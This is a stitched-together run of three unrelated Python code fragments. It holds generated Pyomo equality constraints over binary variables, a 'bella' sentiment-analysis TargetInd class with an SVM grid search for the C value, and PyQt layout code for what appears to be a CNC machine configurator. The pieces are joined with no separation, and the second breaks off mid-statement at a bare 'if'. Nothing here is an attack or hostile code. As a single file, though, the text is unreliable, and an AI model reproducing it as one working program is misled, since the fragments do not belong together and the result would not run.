+ m.x731 + m.x780 + m.x825 + m.x848 + m.x893 + m.x947 + m.x986 + m.x1051 + m.x1068 + m.x1109
+ m.x1158 + m.x1246 + m.x1298 + m.x1340 + m.x1382 + m.x1424 + m.x1466 + m.x1506 + m.x1612
== 1)
m.c1912 = Constraint(expr= m.x207 + m.x284 + m.x387 + m.x489 + m.x544 + m.x605 + m.x639 + m.x681 + m.x732 + m.x781
+ m.x826 + m.x849 + m.x894 + m.x948 + m.x987 + m.x1052 + m.x1069 + m.x1110 + m.x1159
+ m.x1247 + m.x1299 + m.x1341 + m.x1383 + m.x1425 + m.x1467 + m.x1507 + m.x1613 == 1)
m.c1913 = Constraint(expr= m.x75 + m.x97 + m.x145 + m.x208 + m.x251 + m.x285 + m.x309 + m.x388 + m.x490 + m.x545
+ m.x606 + m.x640 + m.x682 + m.x733 + m.x782 + m.x827 + m.x850 + m.x895 + m.x949 + m.x988
+ m.x1160 + m.x1248 + m.x1300 + m.x1342 + m.x1384 + m.x1426 + m.x1468 + m.x1508 + m.x1545
+ m.x1614 == 1)
m.c1914 = Constraint(expr= m.x76 + m.x209 + m.x339 + m.x546 + m.x607 + m.x641 + m.x683 + m.x734 + m.x783 + m.x896
+ m.x950 + m.x989 + m.x1161 + m.x1301 + m.x1343 + m.x1385 + m.x1427 + m.x1469 + m.x1509
+ m.x1615 == 1)
m.c1915 = Constraint(expr= m.x77 + m.x210 + m.x340 + m.x547 + m.x608 + m.x642 + m.x684 + m.x735 + m.x784 + m.x897
+ m.x951 + m.x990 + m.x1302 + m.x1344 + m.x1386 + m.x1428 + m.x1470 + m.x1510 + m.x1616 == 1)
m.c1916 = Constraint(expr= m.x211 + m.x341 + m.x491 + m.x548 + m.x609 + m.x643 + m.x685 + m.x736 + m.x785 + m.x865
+ m.x898 + m.x952 + m.x991 + m.x1111 + m.x1162 + m.x1249 + m.x1303 + m.x1345 + m.x1387
+ m.x1429 + m.x1471 + m.x1617 == 1)
m.c1917 = Constraint(expr= m.x342 + m.x492 + m.x549 + m.x610 + m.x686 + m.x737 + m.x786 + m.x866 + m.x899 + m.x953
+ m.x992 + m.x1112 + m.x1163 + m.x1250 + m.x1304 + m.x1346 + m.x1388 + m.x1430 + m.x1472
+ m.x1576 + m.x1618 == 1)
m.c1918 = Constraint(expr= m.x286 + m.x310 + m.x343 + m.x369 + m.x389 + m.x493 + m.x550 + m.x611 + m.x687 + m.x738
+ m.x787 + m.x828 + m.x900 + m.x993 + m.x1021 + m.x1113 + m.x1164 + m.x1195 + m.x1251
+ m.x1305 + m.x1347 + m.x1389 + m.x1431 + m.x1473 + m.x1511 + m.x1546 + m.x1577 + m.x1619
== 1)
m.c1919 = Constraint(expr= m.x390 + m.x494 + m.x551 + m.x612 + m.x688 + m.x739 + m.x788 + m.x829 + m.x851 + m.x867
+ m.x901 + m.x954 + m.x994 + m.x1022 + m.x1053 + m.x1114 + m.x1165 + m.x1196 + m.x1214
+ m.x1252 + m.x1306 + m.x1348 + m.x1390 + m.x1432 + m.x1474 + m.x1512 + m.x1578 + m.x1620
== 1)
m.c1920 = Constraint(expr= m.x495 + m.x613 + m.x740 + m.x830 + m.x852 + m.x955 + m.x995 + m.x1115 + m.x1166 + m.x1253
+ m.x1621 == 1)
m.c1921 = Constraint(expr= m.x56 + m.x118 + m.x146 + m.x163 + m.x180 + m.x228 + m.x252 + m.x287 + m.x344 + m.x391
+ m.x411 + m.x496 + m.x552 + m.x614 + m.x741 + m.x789 + m.x831 + m.x902 + m.x956 + m.x996
+ m.x1023 + m.x1116 + m.x1167 + m.x1254 + m.x1307 + m.x1349 + m.x1391 + m.x1433 + m.x1475
+ m.x1513 + m.x1547 + m.x1579 + m.x1622 == 1)
m.c1922 = Constraint(expr= m.x288 + m.x392 + m.x412 + m.x497 + m.x553 + m.x615 + m.x689 + m.x742 + m.x790 + m.x832
+ m.x853 + m.x903 + m.x957 + m.x997 + m.x1024 + m.x1117 + m.x1168 + m.x1197 + m.x1215
+ m.x1255 + m.x1308 + m.x1350 + m.x1392 + m.x1434 + m.x1476 + m.x1514 + m.x1548 + m.x1580
+ m.x1623 == 1)
m.c1923 = Constraint(expr= m.x289 + m.x393 + m.x498 + m.x554 + m.x616 + m.x743 + m.x791 + m.x833 + m.x904 + m.x998
+ m.x1025 + m.x1118 + m.x1169 + m.x1198 + m.x1216 + m.x1256 + m.x1309 + m.x1351
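The generated constraints above (m.c1901 through m.c1923) all share one shape: a sum of binary variables equal to 1, i.e. a set-partitioning/assignment structure. A tiny pure-Python sketch of checking that pattern against a candidate assignment — the variable names and groups below are illustrative, not taken from the model:

```python
# Each generated constraint has the form: sum of selected binary x's == 1.
# Pure-Python checker for that set-partitioning pattern (illustrative names).
def satisfies_partition(x, groups):
    """x: dict of variable name -> 0/1; groups: one list of names per constraint."""
    return all(sum(x[v] for v in g) == 1 for g in groups)

groups = [['x1', 'x2', 'x3'], ['x3', 'x4'], ['x4', 'x5', 'x6']]
assignment = {'x1': 1, 'x2': 0, 'x3': 0, 'x4': 1, 'x5': 0, 'x6': 0}
```

A solver enforces exactly this condition on every `m.c19xx` constraint; the checker just verifies it after the fact for a given 0/1 assignment.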
'''
Contains classes of models that can be found in `Vo and Zhang 2015 paper \
<https://www.ijcai.org/Proceedings/15/Papers/194.pdf>`_.
Classes:
1. :py:class:`bella.models.target.TargetInd` - Target independent model
'''
from collections import defaultdict
import copy
import time
import pandas as pd
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import accuracy_score
from sklearn.externals import joblib
from bella.tokenisers import ark_twokenize
from bella.neural_pooling import matrix_max, matrix_min, matrix_avg,\
matrix_median, matrix_prod, matrix_std
from bella.notebook_helper import get_json_data, write_json_data
from bella.scikit_features.context import Context
from bella.scikit_features.tokeniser import ContextTokeniser
from bella.scikit_features.word_vector import ContextWordVectors
from bella.scikit_features.lexicon_filter import LexiconFilter
from bella.scikit_features.neural_pooling import NeuralPooling
from bella.scikit_features.join_context_vectors import JoinContextVectors
class TargetInd():
def __init__(self):
self.model = None
self.pipeline = Pipeline([
('contexts', Context('full')),
('tokens', ContextTokeniser(ark_twokenize, True)),
('word_vectors', ContextWordVectors()),
('pool_funcs', FeatureUnion([
('max_pipe', Pipeline([
('max', NeuralPooling(matrix_max)),
('join', JoinContextVectors(matrix_median))
])),
('min_pipe', Pipeline([
('min', NeuralPooling(matrix_min)),
('join', JoinContextVectors(matrix_median))
])),
('avg_pipe', Pipeline([
('avg', NeuralPooling(matrix_avg)),
('join', JoinContextVectors(matrix_median))
])),
('prod_pipe', Pipeline([
('prod', NeuralPooling(matrix_prod)),
('join', JoinContextVectors(matrix_median))
])),
('std_pipe', Pipeline([
('std', NeuralPooling(matrix_std)),
('join', JoinContextVectors(matrix_median))
]))
])),
('scale', MinMaxScaler()),
('svm', LinearSVC(C=0.01))
])
def save_model(self, model_file, verbose=0):
if self.model is None:
raise ValueError('Model is not fitted. Please fit the model '\
'using the fit function')
time_taken = time.time()
joblib.dump(self.model, model_file)
if verbose == 1:
time_taken = round(time.time() - time_taken, 2)
print('Model saved to {}. Save time {}'\
.format(model_file, time_taken))
def load_model(self, model_file, verbose=0):
if verbose == 1:
time_taken = time.time()
print('Loading model from {}'.format(model_file))
self.model = joblib.load(model_file)
time_taken = round(time.time() - time_taken, 2)
print('Model successfully loaded. Load time {}'.format(time_taken))
else:
self.model = joblib.load(model_file)
def find_best_c(self, train_data, train_y, grid_params, save_file=None,
dataset_name=None, re_write=False, **kwargs):
'''
:param train_data: Training instances to grid search over
:param train_y: Training True values to grid search over
:param grid_params: parameters for the model, all parameters can be \
found from the `get_cv_params` function. The C value parameter will be \
ignored if given.
:param kwargs: keywords arguments to give as arguments to the scikit learn \
`GridSearchCV <http://scikit-learn.org/stable/modules/generated/sklearn.\
model_selection.GridSearchCV.html>`_ object e.g. cv=10.
:type train_data: array/list
:type train_y: array/list
:type grid_params: dict
:type kwargs: dict
:returns: The best C value found and a dict mapping each C value tried \
to its score. Searches a coarse grain set of C values, then a fine grain \
set around the best coarse value, so the best C value is found without a \
full exhaustive search. This method is inspired by `Hsu et al. SVM guide \
<https://www.csie.ntu.edu.tw/~cjlin/papers/guide/guide.pdf>`_
:rtype: tuple
'''
def best_c_value(c_scores):
best = 0
best_c = 0
for c_value, acc in c_scores.items():
if acc > best:
best_c = c_value
best = acc
return float(best_c)
def grid_res_to_dict(grid_results):
c_score = {}
c_scores = grid_results[['param_svm__C', 'mean_test_score']]
for i in c_scores.index:
c_result = c_scores.loc[i]
c_value = c_result['param_svm__C']
test_score = c_result['mean_test_score']
c_score[c_value] = test_score
return c_score
save_file_given = save_file is not None and dataset_name is not None
# If C value given in grid_params remove it
if 'C' in grid_params:
del grid_params['C']
if save_file_given and not re_write:
c_scores = get_json_data(save_file, dataset_name)
if c_scores != {}:
return best_c_value(c_scores), c_scores
# Coarse grain search
coarse_range = []
start = 0.00001
stop = 10
while True:
coarse_range.append(start)
start *= 10
if start > stop:
break
grid_params['C'] = coarse_range
cv_params = self.get_cv_params(**grid_params)
c_scores = {}
coarse_results = self.grid_search(train_data, train_y,
params=cv_params, **kwargs)
c_scores = {**grid_res_to_dict(coarse_results), **c_scores}
best_coarse_c = self.model.best_params_['svm__C']
# Fine grain search
fine_range = [(best_coarse_c / 10) * 3.5,
(best_coarse_c / 10) * 7, best_coarse_c,
best_coarse_c * 3.5, best_coarse_c * 7]
grid_params['C'] = fine_range
cv_params = self.get_cv_params(**grid_params)
fine_results = self.grid_search(train_data, train_y,
params=cv_params, **kwargs)
c_scores = {**grid_res_to_dict(fine_results), **c_scores}
best_c = self.model.best_params_['svm__C']
c_2_string = self.c_param_name(c_scores.keys())
c_scores = {c_2_string[c] : value for c, value in c_scores.items()}
if save_file_given:
write_json_data(save_file, dataset_name, c_scores)
return best_c, c_scores
def c_param_name(self, c_values):
'''
:param c_values: A list of floats representing C values to be mapped to \
String values
:type c_values: list
:returns: A dict of float to String values where the float represents \
the true C value and the String is its String representation.
:rtype: dict
'''
return {c_value : str(c_value) for c_value in c_values}
def senti_lexicon_param_name(self, senti_lexicons):
'''
:param senti_lexicons: A list of Lexicon instances
:type senti_lexicons: list
:returns: A dict mapping Lexicon instance with the String name of the \
lexicon
:rtype: dict
'''
return {senti_lexicon : senti_lexicon.name \
for senti_lexicon in senti_lexicons}
def word_vector_param_name(self, all_word_vectors):
'''
:param all_word_vectors: A list of a list of WordVector instances
:type all_word_vectors: list
:returns: A dict mapping tuples of WordVector instances to their \
String representation, built from each vector's name attribute.
:rtype: dict
'''
word_vector_2_name = {}
for word_vectors in all_word_vectors:
word_vectors_tuple = tuple(word_vectors)
word_vectors_name = [word_vector.name for word_vector in word_vectors]
word_vectors_name = ' '.join(word_vectors_name)
word_vector_2_name[word_vectors_tuple] = word_vectors_name
return word_vector_2_name
def tokeniser_param_name(self, tokenisers):
'''
:param tokenisers: A list of tokeniser functions
:type tokenisers: list
:returns: A dict of tokeniser function to the name of the tokeniser \
function as a String
:rtype: dict
'''
return {tokeniser : tokeniser.__name__ for tokeniser in tokenisers}
def param_name_function(self, param_name):
'''
:param param_name: Name of the only parameter being searched for in \
the grid search
:type param_name: String
:returns: A function that can map the parameter values of the parameter \
name to meaningful String values
:rtype: function
'''
if param_name == 'word_vectors':
return self.word_vector_param_name
elif param_name == 'tokenisers':
return self.tokeniser_param_name
elif param_name == 'C':
return self.c_param_name
elif param_name == 'senti_lexicons':
return self.senti_lexicon_param_name
elif param_name == 'parsers':
return self.tokeniser_param_name
else:
raise ValueError('param_name has to be one of the following values: '\
'word_vectors, tokenisers, C, senti_lexicons or '\
'parsers, not {}'.format(param_name))
@staticmethod
def _get_word_vector_names():
'''
Method to be overridden by subclasses as each pipeline will be different
and will have different parameter names for where the word vectors are
set.
:returns: A list of parameter names where the word vectors are set in \
the pipeline.
:rtype: list
'''
return ['word_vectors__vectors']
@staticmethod
def _get_tokeniser_names():
'''
Method to be overridden by subclasses as each pipeline will be different
and will have different parameter names for where the tokenisers are
set.
:returns: A list of parameter names where the tokenisers are set in \
the pipeline.
:rtype: list
'''
return ['tokens']
@staticmethod
def _add_to_params_dict(params_dict, keys, value):
'''
Given a dictionary, adds the value under each key in the list of keys.
Returns the updated dictionary.
:param params_dict: Dictionary to be updated
:param keys: list of keys
:param value: value to be added to each key in the list of keys.
:type params_dict: dict
:type keys: list
:type value: Python object
:returns: The dictionary updated
:rtype: dict
'''
if not isinstance(keys, list):
raise ValueError('The keys parameter has to be of type list and not {}'\
.format(type(keys)))
for key in keys:
params_dict[key] = value
return params_dict
def get_params(self, word_vector, tokeniser=None, lower=None, C=None,
random_state=None, scale=True):
'''
This method is to be overridden when more values than those listed in the
attributes are required for the model, e.g. a lexicon.
If a value is not required, e.g. lower, then the model has a default value
which will be used when the user does not set one here.
:param word_vector: A list of `bella.word_vectors.WordVectors` \
instances e.g. [WordVectors(), AnotherWordVector()]
:param tokeniser: A tokeniser method from `bella.tokenisers` \
or a method that conforms to the same output as `bella.tokenisers`
:param lower: A bool which indicates whether to lower case the input words.
:param C: A float which indicates the C value of the SVM classifier.
:param random_state: An int which seeds the random number generator used \
to shuffle the data. Used to ensure reproducibility.
:param scale: bool indicating to use scaling or not. Default is to scale.
:type word_vector: list
:type tokeniser: function
:type lower: bool
:type C: float
:type random_state: int
:type scale: bool Default True
:return: A parameter dict which indicates the parameters the model should \
use. The return of this function can be used as the params attribute in \
the `fit` method.
:rtype: dict
'''
params_dict = {}
params_dict = self._add_to_params_dict(params_dict,
self._get_word_vector_names(),
word_vector)
if tokeniser is not None:
tokenisers_names = [param_name + '__tokeniser'
for param_name in self._get_tokeniser_names()]
params_dict = self._add_to_params_dict(params_dict, tokenisers_names,
tokeniser)
if
self.ss7i87in_5.setObjectName("ss7i87in_5")
self.gridLayout_100.addWidget(self.ss7i87in_5, 5, 1, 1, 1)
self.ss7i87in_6 = QtWidgets.QPushButton(self.groupBox_55)
self.ss7i87in_6.setObjectName("ss7i87in_6")
self.gridLayout_100.addWidget(self.ss7i87in_6, 6, 1, 1, 1)
self.ss7i87in_7 = QtWidgets.QPushButton(self.groupBox_55)
self.ss7i87in_7.setObjectName("ss7i87in_7")
self.gridLayout_100.addWidget(self.ss7i87in_7, 7, 1, 1, 1)
self.gridLayout_102.addWidget(self.groupBox_55, 0, 0, 1, 1)
spacerItem12 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_102.addItem(spacerItem12, 1, 0, 1, 1)
self.gridLayout_79.addWidget(self.groupBox_38, 0, 0, 1, 1)
self.smartSerialSW.addWidget(self.ss7i87)
self.gridLayout_59.addWidget(self.smartSerialSW, 1, 0, 1, 1)
self.tabWidget.addTab(self.tab_2, "")
self.options = QtWidgets.QWidget()
self.options.setObjectName("options")
self.manualToolChangeCB = QtWidgets.QCheckBox(self.options)
self.manualToolChangeCB.setGeometry(QtCore.QRect(20, 30, 351, 21))
self.manualToolChangeCB.setObjectName("manualToolChangeCB")
self.debugCB = QtWidgets.QComboBox(self.options)
self.debugCB.setGeometry(QtCore.QRect(468, 30, 241, 23))
self.debugCB.setObjectName("debugCB")
self.label_107 = QtWidgets.QLabel(self.options)
self.label_107.setGeometry(QtCore.QRect(470, 10, 101, 16))
self.label_107.setObjectName("label_107")
self.servoPeriodSB = QtWidgets.QSpinBox(self.options)
self.servoPeriodSB.setGeometry(QtCore.QRect(480, 110, 121, 24))
self.servoPeriodSB.setMaximum(2500000)
self.servoPeriodSB.setSingleStep(1000)
self.servoPeriodSB.setProperty("value", 1000000)
self.servoPeriodSB.setObjectName("servoPeriodSB")
self.label_211 = QtWidgets.QLabel(self.options)
self.label_211.setGeometry(QtCore.QRect(480, 80, 161, 16))
self.label_211.setObjectName("label_211")
self.groupBox_6 = QtWidgets.QGroupBox(self.options)
self.groupBox_6.setGeometry(QtCore.QRect(60, 210, 191, 151))
self.groupBox_6.setObjectName("groupBox_6")
self.gridLayout_51 = QtWidgets.QGridLayout(self.groupBox_6)
self.gridLayout_51.setContentsMargins(8, 15, 8, 8)
self.gridLayout_51.setSpacing(5)
self.gridLayout_51.setObjectName("gridLayout_51")
self.shutdownCB = QtWidgets.QCheckBox(self.groupBox_6)
self.shutdownCB.setObjectName("shutdownCB")
self.gridLayout_51.addWidget(self.shutdownCB, 3, 0, 1, 1)
self.customhalCB = QtWidgets.QCheckBox(self.groupBox_6)
self.customhalCB.setObjectName("customhalCB")
self.gridLayout_51.addWidget(self.customhalCB, 1, 0, 1, 1)
self.postguiCB = QtWidgets.QCheckBox(self.groupBox_6)
self.postguiCB.setObjectName("postguiCB")
self.gridLayout_51.addWidget(self.postguiCB, 2, 0, 1, 1)
self.haluiCB = QtWidgets.QCheckBox(self.groupBox_6)
self.haluiCB.setObjectName("haluiCB")
self.gridLayout_51.addWidget(self.haluiCB, 4, 0, 1, 1)
self.groupBox_10 = QtWidgets.QGroupBox(self.options)
self.groupBox_10.setGeometry(QtCore.QRect(60, 400, 164, 86))
self.groupBox_10.setObjectName("groupBox_10")
self.gridLayout_53 = QtWidgets.QGridLayout(self.groupBox_10)
self.gridLayout_53.setContentsMargins(8, 15, 8, 8)
self.gridLayout_53.setSpacing(5)
self.gridLayout_53.setObjectName("gridLayout_53")
self.pyvcpCB = QtWidgets.QCheckBox(self.groupBox_10)
self.pyvcpCB.setObjectName("pyvcpCB")
self.gridLayout_53.addWidget(self.pyvcpCB, 0, 0, 1, 1)
self.gladevcpCB = QtWidgets.QCheckBox(self.groupBox_10)
self.gladevcpCB.setObjectName("gladevcpCB")
self.gridLayout_53.addWidget(self.gladevcpCB, 1, 0, 1, 1)
self.label_359 = QtWidgets.QLabel(self.options)
self.label_359.setGeometry(QtCore.QRect(480, 140, 381, 20))
self.label_359.setObjectName("label_359")
self.groupBox_14 = QtWidgets.QGroupBox(self.options)
self.groupBox_14.setGeometry(QtCore.QRect(530, 280, 231, 111))
self.groupBox_14.setObjectName("groupBox_14")
self.gridLayout_56 = QtWidgets.QGridLayout(self.groupBox_14)
self.gridLayout_56.setContentsMargins(8, 8, 8, 8)
self.gridLayout_56.setSpacing(5)
self.gridLayout_56.setObjectName("gridLayout_56")
self.splashScreenSB = QtWidgets.QSpinBox(self.groupBox_14)
self.splashScreenSB.setObjectName("splashScreenSB")
self.gridLayout_56.addWidget(self.splashScreenSB, 1, 1, 1, 1)
self.label_360 = QtWidgets.QLabel(self.groupBox_14)
self.label_360.setObjectName("label_360")
self.gridLayout_56.addWidget(self.label_360, 1, 0, 1, 1)
self.label_361 = QtWidgets.QLabel(self.groupBox_14)
self.label_361.setObjectName("label_361")
self.gridLayout_56.addWidget(self.label_361, 0, 0, 1, 1)
self.introGraphicLE = QtWidgets.QLineEdit(self.groupBox_14)
self.introGraphicLE.setObjectName("introGraphicLE")
self.gridLayout_56.addWidget(self.introGraphicLE, 0, 1, 1, 1)
self.label_358 = QtWidgets.QLabel(self.groupBox_14)
self.label_358.setAlignment(QtCore.Qt.AlignCenter)
self.label_358.setObjectName("label_358")
self.gridLayout_56.addWidget(self.label_358, 2, 0, 1, 2)
self.groupBox1 = QtWidgets.QGroupBox(self.options)
self.groupBox1.setGeometry(QtCore.QRect(60, 100, 166, 53))
self.groupBox1.setObjectName("groupBox1")
self.gridLayout_50 = QtWidgets.QGridLayout(self.groupBox1)
self.gridLayout_50.setContentsMargins(8, 8, 8, 8)
self.gridLayout_50.setSpacing(5)
self.gridLayout_50.setObjectName("gridLayout_50")
self.noforcehomingCB = QtWidgets.QCheckBox(self.groupBox1)
self.noforcehomingCB.setObjectName("noforcehomingCB")
self.gridLayout_50.addWidget(self.noforcehomingCB, 0, 0, 1, 1)
self.tabWidget.addTab(self.options, "")
self.plc = QtWidgets.QWidget()
self.plc.setObjectName("plc")
self.ladderGB = QtWidgets.QGroupBox(self.plc)
self.ladderGB.setGeometry(QtCore.QRect(40, 30, 271, 451))
self.ladderGB.setCheckable(True)
self.ladderGB.setChecked(False)
self.ladderGB.setObjectName("ladderGB")
self.gridLayout_28 = QtWidgets.QGridLayout(self.ladderGB)
self.gridLayout_28.setContentsMargins(8, 8, 8, 8)
self.gridLayout_28.setSpacing(5)
self.gridLayout_28.setObjectName("gridLayout_28")
self.label_155 = QtWidgets.QLabel(self.ladderGB)
self.label_155.setObjectName("label_155")
self.gridLayout_28.addWidget(self.label_155, 2, 2, 1, 1)
self.label_143 = QtWidgets.QLabel(self.ladderGB)
self.label_143.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_143.setObjectName("label_143")
self.gridLayout_28.addWidget(self.label_143, 1, 0, 1, 1)
self.label_147 = QtWidgets.QLabel(self.ladderGB)
self.label_147.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_147.setObjectName("label_147")
self.gridLayout_28.addWidget(self.label_147, 6, 0, 1, 1)
self.ladderWordsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderWordsSB.setObjectName("ladderWordsSB")
self.gridLayout_28.addWidget(self.ladderWordsSB, 3, 1, 1, 1)
self.label_153 = QtWidgets.QLabel(self.ladderGB)
self.label_153.setObjectName("label_153")
self.gridLayout_28.addWidget(self.label_153, 1, 2, 1, 1)
self.label_148 = QtWidgets.QLabel(self.ladderGB)
self.label_148.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_148.setObjectName("label_148")
self.gridLayout_28.addWidget(self.label_148, 8, 0, 1, 1)
self.ladderTimersSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderTimersSB.setObjectName("ladderTimersSB")
self.gridLayout_28.addWidget(self.ladderTimersSB, 4, 1, 1, 1)
self.ladderRungsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderRungsSB.setMaximum(200)
self.ladderRungsSB.setObjectName("ladderRungsSB")
self.gridLayout_28.addWidget(self.ladderRungsSB, 1, 1, 1, 1)
self.label_146 = QtWidgets.QLabel(self.ladderGB)
self.label_146.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_146.setObjectName("label_146")
self.gridLayout_28.addWidget(self.label_146, 4, 0, 1, 1)
self.ladderInputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderInputsSB.setObjectName("ladderInputsSB")
self.gridLayout_28.addWidget(self.ladderInputsSB, 8, 1, 1, 1)
self.label_154 = QtWidgets.QLabel(self.ladderGB)
self.label_154.setObjectName("label_154")
self.gridLayout_28.addWidget(self.label_154, 0, 2, 1, 1)
self.label_157 = QtWidgets.QLabel(self.ladderGB)
self.label_157.setObjectName("label_157")
self.gridLayout_28.addWidget(self.label_157, 4, 2, 1, 1)
self.iecTimerSB = QtWidgets.QSpinBox(self.ladderGB)
self.iecTimerSB.setObjectName("iecTimerSB")
self.gridLayout_28.addWidget(self.iecTimerSB, 5, 1, 1, 1)
self.label_149 = QtWidgets.QLabel(self.ladderGB)
self.label_149.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_149.setObjectName("label_149")
self.gridLayout_28.addWidget(self.label_149, 9, 0, 1, 1)
self.label_144 = QtWidgets.QLabel(self.ladderGB)
self.label_144.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_144.setObjectName("label_144")
self.gridLayout_28.addWidget(self.label_144, 2, 0, 1, 1)
self.ladderOutputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderOutputsSB.setObjectName("ladderOutputsSB")
self.gridLayout_28.addWidget(self.ladderOutputsSB, 9, 1, 1, 1)
self.label_159 = QtWidgets.QLabel(self.ladderGB)
self.label_159.setObjectName("label_159")
self.gridLayout_28.addWidget(self.label_159, 5, 2, 1, 1)
self.ladderSectionsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderSectionsSB.setObjectName("ladderSectionsSB")
self.gridLayout_28.addWidget(self.ladderSectionsSB, 11, 1, 1, 1)
self.label_165 = QtWidgets.QLabel(self.ladderGB)
self.label_165.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_165.setObjectName("label_165")
self.gridLayout_28.addWidget(self.label_165, 7, 0, 1, 1)
self.label_166 = QtWidgets.QLabel(self.ladderGB)
self.label_166.setObjectName("label_166")
self.gridLayout_28.addWidget(self.label_166, 7, 2, 1, 1)
self.label_151 = QtWidgets.QLabel(self.ladderGB)
self.label_151.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_151.setObjectName("label_151")
self.gridLayout_28.addWidget(self.label_151, 11, 0, 1, 1)
self.label_145 = QtWidgets.QLabel(self.ladderGB)
self.label_145.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_145.setObjectName("label_145")
self.gridLayout_28.addWidget(self.label_145, 3, 0, 1, 1)
self.ladderExpresionsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderExpresionsSB.setObjectName("ladderExpresionsSB")
self.gridLayout_28.addWidget(self.ladderExpresionsSB, 10, 1, 1, 1)
self.label_161 = QtWidgets.QLabel(self.ladderGB)
self.label_161.setObjectName("label_161")
self.gridLayout_28.addWidget(self.label_161, 8, 2, 1, 1)
self.label_160 = QtWidgets.QLabel(self.ladderGB)
self.label_160.setObjectName("label_160")
self.gridLayout_28.addWidget(self.label_160, 6, 2, 1, 1)
self.ladderBitsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderBitsSB.setObjectName("ladderBitsSB")
self.gridLayout_28.addWidget(self.ladderBitsSB, 2, 1, 1, 1)
self.ladderMonostablesSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderMonostablesSB.setObjectName("ladderMonostablesSB")
self.gridLayout_28.addWidget(self.ladderMonostablesSB, 6, 1, 1, 1)
self.label_150 = QtWidgets.QLabel(self.ladderGB)
self.label_150.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_150.setObjectName("label_150")
self.gridLayout_28.addWidget(self.label_150, 10, 0, 1, 1)
self.label_163 = QtWidgets.QLabel(self.ladderGB)
self.label_163.setObjectName("label_163")
self.gridLayout_28.addWidget(self.label_163, 10, 2, 1, 1)
self.label_162 = QtWidgets.QLabel(self.ladderGB)
self.label_162.setObjectName("label_162")
self.gridLayout_28.addWidget(self.label_162, 9, 2, 1, 1)
self.ladderCountersSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderCountersSB.setObjectName("ladderCountersSB")
self.gridLayout_28.addWidget(self.ladderCountersSB, 7, 1, 1, 1)
self.label_164 = QtWidgets.QLabel(self.ladderGB)
self.label_164.setObjectName("label_164")
self.gridLayout_28.addWidget(self.label_164, 11, 2, 1, 1)
self.label_168 = QtWidgets.QLabel(self.ladderGB)
self.label_168.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_168.setObjectName("label_168")
self.gridLayout_28.addWidget(self.label_168, 13, 0, 1, 1)
self.label_170 = QtWidgets.QLabel(self.ladderGB)
self.label_170.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_170.setObjectName("label_170")
self.gridLayout_28.addWidget(self.label_170, 15, 0, 1, 1)
self.label_158 = QtWidgets.QLabel(self.ladderGB)
self.label_158.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_158.setObjectName("label_158")
self.gridLayout_28.addWidget(self.label_158, 5, 0, 1, 1)
self.label_156 = QtWidgets.QLabel(self.ladderGB)
self.label_156.setObjectName("label_156")
self.gridLayout_28.addWidget(self.label_156, 3, 2, 1, 1)
self.label_167 = QtWidgets.QLabel(self.ladderGB)
self.label_167.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_167.setObjectName("label_167")
self.gridLayout_28.addWidget(self.label_167, 12, 0, 1, 1)
self.label_169 = QtWidgets.QLabel(self.ladderGB)
self.label_169.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_169.setObjectName("label_169")
self.gridLayout_28.addWidget(self.label_169, 14, 0, 1, 1)
self.label_171 = QtWidgets.QLabel(self.ladderGB)
self.label_171.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_171.setObjectName("label_171")
self.gridLayout_28.addWidget(self.label_171, 16, 0, 1, 1)
self.ladderSymbolsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderSymbolsSB.setObjectName("ladderSymbolsSB")
self.gridLayout_28.addWidget(self.ladderSymbolsSB, 12, 1, 1, 1)
self.ladderS32InputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderS32InputsSB.setObjectName("ladderS32InputsSB")
self.gridLayout_28.addWidget(self.ladderS32InputsSB, 13, 1, 1, 1)
self.ladderS32OuputsSB = QtWidgets.QSpinBox(self.ladderGB)
self.ladderS32OuputsSB.setObjectName("ladderS32OuputsSB")
self.gridLayout_28.addWidget(self.ladderS32OuputsSB, 14, 1, 1, 1)
